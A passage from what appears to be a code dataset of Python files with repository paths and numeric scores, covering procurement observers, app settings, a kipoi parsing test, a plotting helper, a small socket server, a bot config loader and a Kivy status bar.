message.get('lot_contract_status') in LOT_CONTRACT_TERMINAL_STATUSES
):
return True
def _run(self, message):
LOGGER.info(
'Contract %s of lot %s is already in terminal status %s',
message['lot_contract_id'],
message['lot_id'],
message['lot_contract_status']
)
self._notify_observers(message)
class LotContractNotFoundHandler(BaseObserverObservable):
def _activate(self, message):
if (
message.get('error') == LOT_CONTRACT_NOT_FOUND
):
return True
def _run(self, message):
LOGGER.error(
"Lot {0} or some it's subresource {1} not found".format(
message['lot_id'],
message.get('lot_contract_id', '<Not Found>')
),
extra={'MESSAGE_ID': LOT_OR_CONTRACT_NOT_FOUND_MSG}
) | openprocurement/caravan/observers/lot.py | from openprocurement_client.exceptions import (
ResourceNotFound,
)
from openprocurement.caravan.observers.base_observer import (
BaseObserverObservable,
ObserverObservableWithClient,
)
from openprocurement.caravan.observers.constants import (
CONTRACT_STATUS_MAPPING,
LOT_CONTRACT_TERMINAL_STATUSES,
)
from openprocurement.caravan.utils import (
search_lot_contract_by_related_contract, LOGGER
)
from openprocurement.caravan.observers.errors import (
LOT_CONTRACT_NOT_FOUND,
)
from openprocurement.caravan.constants import (
PATCH_LOT_CONTRACT_MSG,
LOT_OR_CONTRACT_NOT_FOUND_MSG,
SEARCH_LOT_CONTRACT_MSG
)
class LotContractChecker(ObserverObservableWithClient):
"""Adds lot's status to received message"""
def _activate(self, message):
if not message.get('error'):
return True
def _run(self, message):
LOGGER.info(
"Searching lot %s for contract related to %s contract",
message['lot_id'],
message['contract_id'],
extra={'MESSAGE_ID': SEARCH_LOT_CONTRACT_MSG}
)
lot_contract = None
try:
lot_contract = self._check_lot_contract(message)
except ResourceNotFound:
LOGGER.warning("Related contract not found: HTTP 404 error on the Lot resource")
result = self._prepare_error_message(LOT_CONTRACT_NOT_FOUND, message)
else:
if lot_contract is None: # contract not found
LOGGER.warning(
"Related contract not found: Lot model has not contract related to %s",
message['contract_id'],
)
return
LOGGER.info("Found %s contract", lot_contract.id)
result = self._prepare_message(lot_contract, message)
self._notify_observers(result)
def _check_lot_contract(self, message):
return search_lot_contract_by_related_contract(
self.client,
message['lot_id'],
message['contract_id']
)
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.status,
'lot_contract_id': lot_contract.id
})
return recv_message
def _prepare_error_message(self, error, in_message):
if error == LOT_CONTRACT_NOT_FOUND:
in_message.update({'error': LOT_CONTRACT_NOT_FOUND})
return in_message
class LotContractPatcher(ObserverObservableWithClient):
def _activate(self, message):
if (
not message.get('error')
# skip already finished contracts
and not (message['lot_contract_status'] in LOT_CONTRACT_TERMINAL_STATUSES)
):
return True
def _run(self, message):
LOGGER.info(
"Patching lot contract %s of lot %s",
message['lot_contract_id'],
message['lot_id'],
extra={'MESSAGE_ID': PATCH_LOT_CONTRACT_MSG}
)
lot_conract = self._patch_lot_contract(message)
out_message = self._prepare_message(lot_conract, message)
self._notify_observers(out_message)
def _patch_lot_contract(self, message):
target_lot_contract_status = CONTRACT_STATUS_MAPPING.get(message['contract_status'])
contract = self.client.patch_contract(
message['lot_id'],
message['lot_contract_id'],
None,
{"data": {"status": target_lot_contract_status}}
)
return contract
def _prepare_message(self, lot_contract, recv_message):
recv_message.update({
'lot_contract_status': lot_contract.data.status
})
return recv_message
class LotContractAlreadyCompleteHandler(BaseObserverObservable):
def _activate(self, message):
if (
message.get('lot_contract_status') in LOT_CONTRACT_TERMINAL_STATUSES
):
return True
def _run(self, message):
LOGGER.info(
'Contract %s of lot %s is already in terminal status %s',
message['lot_contract_id'],
message['lot_id'],
message['lot_contract_status']
)
self._notify_observers(message)
class LotContractNotFoundHandler(BaseObserverObservable):
def _activate(self, message):
if (
message.get('error') == LOT_CONTRACT_NOT_FOUND
):
return True
def _run(self, message):
LOGGER.error(
"Lot {0} or some it's subresource {1} not found".format(
message['lot_id'],
message.get('lot_contract_id', '<Not Found>')
),
extra={'MESSAGE_ID': LOT_OR_CONTRACT_NOT_FOUND_MSG}
) | 0.446495 | 0.085939 |
import os
basedir = os.path.abspath(os.path.dirname(__file__))
VERSION = '0.1'
URL_PREFIX_VERSION = '/api'
GEO_FILE = 'logtoes/geocity/GeoLiteCity.dat'
HOST = 'localhost'
PORT = 5555
DEBUG = True
BRANCH = 'master'
TRAP_HTTP_EXCEPTIONS = True
TRAP_BAD_REQUEST_ERRORS = True
JSONIFY_PRETTYPRINT_REGULAR = True
ERROR_404_HELP = False
ERROR_TO_FILE = True
ERROR_LOG_NAME = 'logs/errors.log'
CELERY_BROKER_URL = ['redis://localhost:6379/0']
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERYD_LOG_FILE = "logs/celery.log"
CELERY_IGNORE_RESULT = False
CELERY_TASK_RESULT_EXPIRES = 3600
CELERY_ENABLE_UTC = True
CELERY_DEFAULT_ROUTING_KEY = "logtoes"
CELERY_DEFAULT_QUEUE = 'logtoes'
CELERY_DEFAULT_EXCHANGE = "logtoes"
CELERY_DEFAULT_EXCHANGE_TYPE = "direct"
CELERY_DISABLE_RATE_LIMITS = True
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True}
BROKER_CONNECTION_MAX_RETRIES = 0
BROKER_FAILOVER_STRATEGY = "round-robin"
BROKER_HEARTBEAT = 10
FIREHOSE_STREAM = 'logtofirehose'
FIREHOSE_ENABLED = True
ELASTICSEARCH_URL = 'elastic'
ELASTICSEARCH_PORT = 9200
ELASTICSEARCH_INDEX = 'logtoes'
ELASTICSEARCH_MAPPPING = 'logtoes'
ELASTICSEARCH_ENABLED = True
ELASTICSEARCH_SETTINGS = {
"settings": {
"index": {
"number_of_shards": 3,
"number_of_replicas": 0
}
},
"mappings": {
"api_requests": {
"properties": {
"@timestamp": {
"type": "date"
},
"ip": {
"type": "ip"
},
"location": {
"type": "geo_point"
},
"country": {
"type": "multi_field",
"fields": {
"country": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"user": {
"type": "string"
},
"request": {
"type": "multi_field",
"fields": {
"request": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"status code": {
"type": "integer"
},
"query": {
"type": "string"
},
"agent": {
"type": "multi_field",
"fields": {
"agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"raw agent": {
"type": "multi_field",
"fields": {
"raw agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
}
}
}
}
}
try:
from local_settings import *
except ImportError:
pass
try:
from settings import *
except ImportError:
pass | logtoes/default_settings.py | import os
basedir = os.path.abspath(os.path.dirname(__file__))
VERSION = '0.1'
URL_PREFIX_VERSION = '/api'
GEO_FILE = 'logtoes/geocity/GeoLiteCity.dat'
HOST = 'localhost'
PORT = 5555
DEBUG = True
BRANCH = 'master'
TRAP_HTTP_EXCEPTIONS = True
TRAP_BAD_REQUEST_ERRORS = True
JSONIFY_PRETTYPRINT_REGULAR = True
ERROR_404_HELP = False
ERROR_TO_FILE = True
ERROR_LOG_NAME = 'logs/errors.log'
CELERY_BROKER_URL = ['redis://localhost:6379/0']
CELERY_RESULT_BACKEND = 'redis://localhost:6379'
CELERYD_LOG_FILE = "logs/celery.log"
CELERY_IGNORE_RESULT = False
CELERY_TASK_RESULT_EXPIRES = 3600
CELERY_ENABLE_UTC = True
CELERY_DEFAULT_ROUTING_KEY = "logtoes"
CELERY_DEFAULT_QUEUE = 'logtoes'
CELERY_DEFAULT_EXCHANGE = "logtoes"
CELERY_DEFAULT_EXCHANGE_TYPE = "direct"
CELERY_DISABLE_RATE_LIMITS = True
CELERY_ACCEPT_CONTENT = ['json']
CELERY_TASK_SERIALIZER = 'json'
CELERY_RESULT_SERIALIZER = 'json'
BROKER_TRANSPORT_OPTIONS = {'fanout_prefix': True}
BROKER_CONNECTION_MAX_RETRIES = 0
BROKER_FAILOVER_STRATEGY = "round-robin"
BROKER_HEARTBEAT = 10
FIREHOSE_STREAM = 'logtofirehose'
FIREHOSE_ENABLED = True
ELASTICSEARCH_URL = 'elastic'
ELASTICSEARCH_PORT = 9200
ELASTICSEARCH_INDEX = 'logtoes'
ELASTICSEARCH_MAPPPING = 'logtoes'
ELASTICSEARCH_ENABLED = True
ELASTICSEARCH_SETTINGS = {
"settings": {
"index": {
"number_of_shards": 3,
"number_of_replicas": 0
}
},
"mappings": {
"api_requests": {
"properties": {
"@timestamp": {
"type": "date"
},
"ip": {
"type": "ip"
},
"location": {
"type": "geo_point"
},
"country": {
"type": "multi_field",
"fields": {
"country": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"user": {
"type": "string"
},
"request": {
"type": "multi_field",
"fields": {
"request": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"status code": {
"type": "integer"
},
"query": {
"type": "string"
},
"agent": {
"type": "multi_field",
"fields": {
"agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
},
"raw agent": {
"type": "multi_field",
"fields": {
"raw agent": {"type": "string", "index": "analyzed"},
"untouched": {"type": "string", "index": "not_analyzed"}
}
}
}
}
}
}
try:
from local_settings import *
except ImportError:
pass
try:
from settings import *
except ImportError:
pass | 0.164416 | 0.149097 |
import os
import pytest
import six
from pytest import raises
from kipoi.specs import DataLoaderDescription, example_kwargs, RemoteFile
from related import from_yaml
# Class to test
CLS = DataLoaderDescription
# common header
inp_targ = """
"""
GOOD_EXAMPLES = ["""
type: Dataset
defined_as: dataloader.py::SeqDistDataset
args:
intervals_file:
doc: tsv file with `chrom start end id score strand`
example:
url: https://github.com/kipoi/kipoi/raw/f86a2162d15c92e72adeae2988bd1757732c79b0/example/models/rbp/example_files/intervals.tsv
md5: 3be79e1757422fdaa337cdcde8a7b8bc
type: str
fasta_file:
doc: Reference genome sequence
example: genome.fa
gtf_file:
doc: file path; Genome annotation GTF file pickled using pandas.
example: gtf.gtf
preproc_transformer:
doc: path to the serialized tranformer used for pre-processing.
example: path.transformer
target_file:
doc: path to the targets (txt) file
optional: True # use the same semantics as for the CLI interface?
info:
authors:
- name: <NAME>
name: rbp_eclip
version: 0.1
doc: RBP binding prediction
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
associated_metadata: ranges
dist_polya_st:
shape: (1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Measured binding strength
metadata:
ranges:
chr:
type: str
doc: Chromosome
start:
type: int
doc: Start position
end:
type: int
doc: End position
id:
type: str
doc: Id of the sequence
strand:
type: str
doc: Sequence strand
"""]
BAD_EXAMPLES = ["""
type: keras
args:
arch: model/model.json
weights: model/weights.h5
custom_objects: model/custom_keras_objects.py
default_dataloader: dataloader.yaml # shall we call it just dataloader?
# info is missing
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
dist_polya_st:
shape: (None, 1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Predicted binding strength
"""]
@pytest.mark.parametrize("info_str", GOOD_EXAMPLES)
def test_parse_correct_info(info_str, tmpdir):
info_str = inp_targ + info_str # add the input: targets headers
# loading works
info = CLS.from_config(from_yaml(info_str))
info.path = str(tmpdir)
outfiles = example_kwargs(info.args, str(tmpdir))
assert os.path.exists(outfiles['intervals_file'])
assert isinstance(info.get_example_kwargs(), dict)
assert isinstance(example_kwargs(info.args), dict)
assert isinstance(info.args["intervals_file"].example, RemoteFile)
assert isinstance(info.args["fasta_file"].example, str)
# cfg works
cfg = info.get_config()
info2 = CLS.from_config(cfg)
assert str(info) == str(info2)
@pytest.mark.parametrize("info_str", BAD_EXAMPLES)
def test_parse_bad_info(info_str):
info_str = inp_targ + info_str # add the input: targets headers
bim = from_yaml(info_str)
with raises(Exception):
CLS.from_config(bim)
# --------------------------------------------
# load example yaml files
KERAS_EXAMPLES_TO_LOAD = ["rbp", "extended_coda"]
@pytest.mark.parametrize("example", KERAS_EXAMPLES_TO_LOAD)
def test_model_loading_on_examples(example):
"""Test extractor
"""
model_file = "example/models/{0}/dataloader.yaml".format(example)
dl = DataLoaderDescription.load(model_file)
# check all the fields exists
dl.type == "Dataset"
dl.defined_as
dl.args
arg_elem = six.next(six.itervalues(dl.args))
arg_elem.doc
arg_elem.type
arg_elem.optional
dl.info
dl.info.authors
dl.info.name
dl.info.version
dl.info.tags
dl.info.doc
dl.output_schema
dl.output_schema.inputs
inp_elem = six.next(six.itervalues(dl.output_schema.inputs))
inp_elem.shape
inp_elem.special_type
inp_elem.associated_metadata
dl.output_schema.targets
dl.output_schema.metadata | tests/specs/parsing/test_027_parsing_DataLoaderDescription.py | import os
import pytest
import six
from pytest import raises
from kipoi.specs import DataLoaderDescription, example_kwargs, RemoteFile
from related import from_yaml
# Class to test
CLS = DataLoaderDescription
# common header
inp_targ = """
"""
GOOD_EXAMPLES = ["""
type: Dataset
defined_as: dataloader.py::SeqDistDataset
args:
intervals_file:
doc: tsv file with `chrom start end id score strand`
example:
url: https://github.com/kipoi/kipoi/raw/f86a2162d15c92e72adeae2988bd1757732c79b0/example/models/rbp/example_files/intervals.tsv
md5: 3be79e1757422fdaa337cdcde8a7b8bc
type: str
fasta_file:
doc: Reference genome sequence
example: genome.fa
gtf_file:
doc: file path; Genome annotation GTF file pickled using pandas.
example: gtf.gtf
preproc_transformer:
doc: path to the serialized tranformer used for pre-processing.
example: path.transformer
target_file:
doc: path to the targets (txt) file
optional: True # use the same semantics as for the CLI interface?
info:
authors:
- name: <NAME>
name: rbp_eclip
version: 0.1
doc: RBP binding prediction
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
associated_metadata: ranges
dist_polya_st:
shape: (1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Measured binding strength
metadata:
ranges:
chr:
type: str
doc: Chromosome
start:
type: int
doc: Start position
end:
type: int
doc: End position
id:
type: str
doc: Id of the sequence
strand:
type: str
doc: Sequence strand
"""]
BAD_EXAMPLES = ["""
type: keras
args:
arch: model/model.json
weights: model/weights.h5
custom_objects: model/custom_keras_objects.py
default_dataloader: dataloader.yaml # shall we call it just dataloader?
# info is missing
output_schema:
inputs:
seq:
shape: (4, 101)
special_type: DNASeq
doc: One-hot encoded RNA sequence
dist_polya_st:
shape: (None, 1, 10)
doc: Distance to poly-a site transformed with B-splines
targets:
binding_site:
shape: (1, )
doc: Predicted binding strength
"""]
@pytest.mark.parametrize("info_str", GOOD_EXAMPLES)
def test_parse_correct_info(info_str, tmpdir):
info_str = inp_targ + info_str # add the input: targets headers
# loading works
info = CLS.from_config(from_yaml(info_str))
info.path = str(tmpdir)
outfiles = example_kwargs(info.args, str(tmpdir))
assert os.path.exists(outfiles['intervals_file'])
assert isinstance(info.get_example_kwargs(), dict)
assert isinstance(example_kwargs(info.args), dict)
assert isinstance(info.args["intervals_file"].example, RemoteFile)
assert isinstance(info.args["fasta_file"].example, str)
# cfg works
cfg = info.get_config()
info2 = CLS.from_config(cfg)
assert str(info) == str(info2)
@pytest.mark.parametrize("info_str", BAD_EXAMPLES)
def test_parse_bad_info(info_str):
info_str = inp_targ + info_str # add the input: targets headers
bim = from_yaml(info_str)
with raises(Exception):
CLS.from_config(bim)
# --------------------------------------------
# load example yaml files
KERAS_EXAMPLES_TO_LOAD = ["rbp", "extended_coda"]
@pytest.mark.parametrize("example", KERAS_EXAMPLES_TO_LOAD)
def test_model_loading_on_examples(example):
"""Test extractor
"""
model_file = "example/models/{0}/dataloader.yaml".format(example)
dl = DataLoaderDescription.load(model_file)
# check all the fields exists
dl.type == "Dataset"
dl.defined_as
dl.args
arg_elem = six.next(six.itervalues(dl.args))
arg_elem.doc
arg_elem.type
arg_elem.optional
dl.info
dl.info.authors
dl.info.name
dl.info.version
dl.info.tags
dl.info.doc
dl.output_schema
dl.output_schema.inputs
inp_elem = six.next(six.itervalues(dl.output_schema.inputs))
inp_elem.shape
inp_elem.special_type
inp_elem.associated_metadata
dl.output_schema.targets
dl.output_schema.metadata | 0.729327 | 0.458106 |
import os
from anycurve import losscurve
class a2v_curve():
def __init__(self, cfg):
self.cfg = cfg
self.curve = self.setup()
def setup(self):
loss_curve_dir = os.path.join(self.cfg.LOG_DIR, 'loss_curve_db')
loss_curve = losscurve(db_path=loss_curve_dir, db_name='data', figsize=(20, 12))
loss_curve.add_key('loss')
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
loss_curve.add_key('{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
loss_curve.add_key('{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
else:
loss_curve.add_key('pasta_map')
loss_curve.add_key('verb_map')
loss_curve.set_xlabel('iteration')
loss_curve.set_ylabel('loss', False)
loss_curve.set_ylabel('mAP', True)
loss_curve.daemon(True, self.cfg.TRAIN.SHOW_INTERVAL // self.cfg.TRAIN.DISPLAY_INTERVAL)
return loss_curve
def log(self, feed_dict):
self.curve.log(feed_dict)
def render(self):
if self.curve.daemon():
self.curve.clean()
self.curve.draw('iteration', 'loss', self.cfg.MODEL_NAME + '_loss')
self.curve.twin()
self.curve.clean()
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
self.curve.draw('iteration', '{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_w_nointer')
self.curve.draw('iteration', '{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_wo_nointer')
else:
self.curve.draw('iteration', 'pasta_map', self.cfg.MODEL_NAME + '_pasta')
self.curve.draw('iteration', 'verb_map', self.cfg.MODEL_NAME + '_verb')
self.curve.twin()
self.curve.reset_choice()
self.curve.legend(inside=False)
self.curve.synchronize()
self.curve.render(os.path.join(self.cfg.LOG_DIR, 'curve.png')) | activity2vec/ult/visualize.py | import os
from anycurve import losscurve
class a2v_curve():
def __init__(self, cfg):
self.cfg = cfg
self.curve = self.setup()
def setup(self):
loss_curve_dir = os.path.join(self.cfg.LOG_DIR, 'loss_curve_db')
loss_curve = losscurve(db_path=loss_curve_dir, db_name='data', figsize=(20, 12))
loss_curve.add_key('loss')
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
loss_curve.add_key('{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
loss_curve.add_key('{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]))
else:
loss_curve.add_key('pasta_map')
loss_curve.add_key('verb_map')
loss_curve.set_xlabel('iteration')
loss_curve.set_ylabel('loss', False)
loss_curve.set_ylabel('mAP', True)
loss_curve.daemon(True, self.cfg.TRAIN.SHOW_INTERVAL // self.cfg.TRAIN.DISPLAY_INTERVAL)
return loss_curve
def log(self, feed_dict):
self.curve.log(feed_dict)
def render(self):
if self.curve.daemon():
self.curve.clean()
self.curve.draw('iteration', 'loss', self.cfg.MODEL_NAME + '_loss')
self.curve.twin()
self.curve.clean()
if len(self.cfg.MODEL.MODULE_TRAINED) == 1 and self.cfg.MODEL.MODULE_TRAINED[0] != 'verb':
self.curve.draw('iteration', '{:s}_map_w_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_w_nointer')
self.curve.draw('iteration', '{:s}_map_wo_no_interaction'.format(self.cfg.MODEL.MODULE_TRAINED[0]), self.cfg.MODEL_NAME + '_' + self.cfg.MODEL.MODULE_TRAINED[0] + '_wo_nointer')
else:
self.curve.draw('iteration', 'pasta_map', self.cfg.MODEL_NAME + '_pasta')
self.curve.draw('iteration', 'verb_map', self.cfg.MODEL_NAME + '_verb')
self.curve.twin()
self.curve.reset_choice()
self.curve.legend(inside=False)
self.curve.synchronize()
self.curve.render(os.path.join(self.cfg.LOG_DIR, 'curve.png')) | 0.818338 | 0.084531 |
import socket
import select
import queue as Queue
from request import Request
from response import Response, DefaultResponse
class Server:
inputs = []
outputs = []
messages = {}
routes = {}
donotkill = False
def __init__(self,port=2145):
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.bind(('',port))
self.sock.listen(50)
self.sock.setblocking(0)
self.inputs.append(self.sock)
def handle_new_connection(self):
conn, addr = self.sock.accept()
conn.setblocking(0)
self.inputs.append(conn)
self.messages[conn] = Queue.Queue()
def handle_new_readable(self,conn):
data = conn.recv(60000)
if not data:
return self.remove_connection(conn)
request = Request(data.decode())
self.messages[conn].put(self.answer(request))
if conn not in self.outputs:
self.outputs.append(conn)
def remove_connection(self,conn):
if conn in self.outputs:
self.outputs.remove(conn)
self.inputs.remove(conn)
conn.close()
del self.messages[conn]
def handle_readables(self,conn):
if conn is self.sock:
self.handle_new_connection()
else:
self.handle_new_readable(conn)
def handle_writeables(self,conn):
try:
msg = self.messages[conn].get_nowait()
except Queue.Empty:
self.outputs.remove(conn)
else:
conn.send(msg)
self.remove_connection(conn)
def handle_exceptionals(self,conn):
self.remove_connection(conn)
def __call__(self):
while self.inputs:
r,w,e = select.select(self.inputs,self.outputs,self.inputs)
for s in r:
self.handle_readables(s)
for s in w:
self.handle_writeables(s)
for s in e:
self.handle_execptionals(s)
def add_route(self,route,function):
self.routes[route] = function
def answer(self,request):
route = request.Header.Route
if route not in self.routes:
return DefaultResponse.NotFound()
try:
return Response(request.Header,self.routes[route](request.Body))
except:
return DefaultResponse.BadRequest()
A = Server()
A.add_route('/',lambda x: None)
A() | server.py | import socket
import select
import queue as Queue
from request import Request
from response import Response, DefaultResponse
class Server:
inputs = []
outputs = []
messages = {}
routes = {}
donotkill = False
def __init__(self,port=2145):
self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.sock.bind(('',port))
self.sock.listen(50)
self.sock.setblocking(0)
self.inputs.append(self.sock)
def handle_new_connection(self):
conn, addr = self.sock.accept()
conn.setblocking(0)
self.inputs.append(conn)
self.messages[conn] = Queue.Queue()
def handle_new_readable(self,conn):
data = conn.recv(60000)
if not data:
return self.remove_connection(conn)
request = Request(data.decode())
self.messages[conn].put(self.answer(request))
if conn not in self.outputs:
self.outputs.append(conn)
def remove_connection(self,conn):
if conn in self.outputs:
self.outputs.remove(conn)
self.inputs.remove(conn)
conn.close()
del self.messages[conn]
def handle_readables(self,conn):
if conn is self.sock:
self.handle_new_connection()
else:
self.handle_new_readable(conn)
def handle_writeables(self,conn):
try:
msg = self.messages[conn].get_nowait()
except Queue.Empty:
self.outputs.remove(conn)
else:
conn.send(msg)
self.remove_connection(conn)
def handle_exceptionals(self,conn):
self.remove_connection(conn)
def __call__(self):
while self.inputs:
r,w,e = select.select(self.inputs,self.outputs,self.inputs)
for s in r:
self.handle_readables(s)
for s in w:
self.handle_writeables(s)
for s in e:
self.handle_execptionals(s)
def add_route(self,route,function):
self.routes[route] = function
def answer(self,request):
route = request.Header.Route
if route not in self.routes:
return DefaultResponse.NotFound()
try:
return Response(request.Header,self.routes[route](request.Body))
except:
return DefaultResponse.BadRequest()
A = Server()
A.add_route('/',lambda x: None)
A() | 0.234582 | 0.059156 |
import json
import sys
import portalocker
from bot import utils
default_config = {
"general": {
"language": "en",
"cache_file_name": "TTMediaBotCache.dat",
"blocked_commands": [],
"send_channel_messages": True,
"delete_uploaded_files_after": 300,
"time_format": r"%H:%M",
"load_event_handlers": False,
"event_handlers_file_name": "event_handlers.py",
},
"sound_devices": {
"output_device": 0,
"input_device": 0
},
"player": {
"default_volume": 50,
"max_volume": 100,
"volume_fading": True,
"volume_fading_interval": 0.025,
"seek_step": 5,
"player_options": {
"video": False,
},
},
"teamtalk": {
"hostname": "localhost",
"tcp_port": 10333,
"udp_port": 10333,
"encrypted": False,
"nickname": "TTMediaBot",
"status": "",
"gender": "n",
"username": "",
"password": "",
"channel": "/",
"channel_password": "",
"license_name": "",
"license_key": "",
"reconnection_attempts": -1,
"reconnection_timeout": 0,
"users": {
"admins": ["admin"],
"banned_users": []
}
},
"services": {
"available_services": {
"vk": {
"token": "",
},
"yt": {}
},
"default_service": "vk"
},
"logger": {
"log": True,
"level": "INFO",
"format": "%(levelname)s [%(asctime)s]: %(message)s in %(threadName)s file: %(filename)s line %(lineno)d function %(funcName)s",
"mode": 2,
"file_name": "TTMediaBot.log",
"max_file_size": 0,
"backup_count": 0
}
}
class Config(dict):
def __init__(self, file_name):
if file_name:
if utils.check_file_path(file_name):
self.file_name = file_name
with open(self.file_name, 'r', encoding='UTF-8') as f:
try:
config_dict = json.load(f)
except json.decoder.JSONDecodeError as e:
print("Syntax error in configuration file:", e)
sys.exit(1)
self.file_locker = portalocker.Lock(self.file_name, timeout=0, flags=portalocker.LOCK_EX|portalocker.LOCK_NB)
try:
self.file_locker.acquire()
except portalocker.exceptions.LockException:
raise PermissionError()
else:
print("Incorrect config file path")
sys.exit(1)
else:
config_dict = {}
super().__init__(self.fill(config_dict, default_config))
def close(self):
self.file_locker.release()
def fill(self, data, template):
result = {}
for key in template:
if key in data and type(template[key]) == dict:
result[key] = self.fill(data[key], template[key])
del data[key]
elif key in data:
result[key] = data[key]
del data[key]
else:
result[key] = template[key]
result.update(data)
return result
def save(self):
self.file_locker.release()
with open(self.file_name, 'w', encoding='UTF-8') as f:
json.dump(self, f, indent=4, ensure_ascii=False)
self.file_locker.acquire() | bot/config.py | import json
import sys
import portalocker
from bot import utils
default_config = {
"general": {
"language": "en",
"cache_file_name": "TTMediaBotCache.dat",
"blocked_commands": [],
"send_channel_messages": True,
"delete_uploaded_files_after": 300,
"time_format": r"%H:%M",
"load_event_handlers": False,
"event_handlers_file_name": "event_handlers.py",
},
"sound_devices": {
"output_device": 0,
"input_device": 0
},
"player": {
"default_volume": 50,
"max_volume": 100,
"volume_fading": True,
"volume_fading_interval": 0.025,
"seek_step": 5,
"player_options": {
"video": False,
},
},
"teamtalk": {
"hostname": "localhost",
"tcp_port": 10333,
"udp_port": 10333,
"encrypted": False,
"nickname": "TTMediaBot",
"status": "",
"gender": "n",
"username": "",
"password": "",
"channel": "/",
"channel_password": "",
"license_name": "",
"license_key": "",
"reconnection_attempts": -1,
"reconnection_timeout": 0,
"users": {
"admins": ["admin"],
"banned_users": []
}
},
"services": {
"available_services": {
"vk": {
"token": "",
},
"yt": {}
},
"default_service": "vk"
},
"logger": {
"log": True,
"level": "INFO",
"format": "%(levelname)s [%(asctime)s]: %(message)s in %(threadName)s file: %(filename)s line %(lineno)d function %(funcName)s",
"mode": 2,
"file_name": "TTMediaBot.log",
"max_file_size": 0,
"backup_count": 0
}
}
class Config(dict):
def __init__(self, file_name):
if file_name:
if utils.check_file_path(file_name):
self.file_name = file_name
with open(self.file_name, 'r', encoding='UTF-8') as f:
try:
config_dict = json.load(f)
except json.decoder.JSONDecodeError as e:
print("Syntax error in configuration file:", e)
sys.exit(1)
self.file_locker = portalocker.Lock(self.file_name, timeout=0, flags=portalocker.LOCK_EX|portalocker.LOCK_NB)
try:
self.file_locker.acquire()
except portalocker.exceptions.LockException:
raise PermissionError()
else:
print("Incorrect config file path")
sys.exit(1)
else:
config_dict = {}
super().__init__(self.fill(config_dict, default_config))
def close(self):
self.file_locker.release()
def fill(self, data, template):
result = {}
for key in template:
if key in data and type(template[key]) == dict:
result[key] = self.fill(data[key], template[key])
del data[key]
elif key in data:
result[key] = data[key]
del data[key]
else:
result[key] = template[key]
result.update(data)
return result
def save(self):
self.file_locker.release()
with open(self.file_name, 'w', encoding='UTF-8') as f:
json.dump(self, f, indent=4, ensure_ascii=False)
self.file_locker.acquire() | 0.125159 | 0.23688 |
from kivy.factory import Factory
from kivy.properties import NumericProperty, BooleanProperty
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from cobiv.modules.core.component import Component
class StatusLabel(Component, Label):
def __init__(self, **kwargs):
super(StatusLabel, self).__init__(valign='middle', **kwargs)
self.bind(size=self.setter('text_size'))
self.session = self.get_session()
self.template_text = kwargs.get('text')
self.refresh()
def refresh(self):
if self.session is not None:
self.text = self.session.fill_text_fields(self.template_text)
else:
self.text = self.template_text
class StatusBar(Component, BoxLayout):
enabled = BooleanProperty(True)
def __init__(self, **kwargs):
height = kwargs.pop('height', 20)
super().__init__(size_hint=(1, None), height=height, **kwargs)
self.session = self.get_session()
if self.session is not None:
self.session.cursor.bind(file_id=self.on_file_id_change)
self.bind(enabled=self.set_enabled)
def set_enabled(self, instance, value):
if value:
self.bind_cursor()
else:
self.unbind_cursor()
def on_file_id_change(self, instance, value):
self.refresh_widgets()
def refresh_widgets(self):
for c in self.children:
refresh = getattr(c, 'refresh', None)
if refresh is not None:
c.refresh()
def add_label(self, text='', align='center', size=0, **kwargs):
if size == 0:
label = StatusLabel(text=text, halign=align)
else:
label = StatusLabel(text=text, halign=align, width=size, size_hint=(None, 1))
self.add_widget(label)
def init_items(self, config_items):
for cfg_item in config_items:
self.add_label(**cfg_item)
def bind_cursor(self):
pass
def unbind_cursor(self):
pass
Factory.register('SimpleStatusBar', cls=StatusBar) | cobiv/modules/hud_components/sidebar/statusbar.py | from kivy.factory import Factory
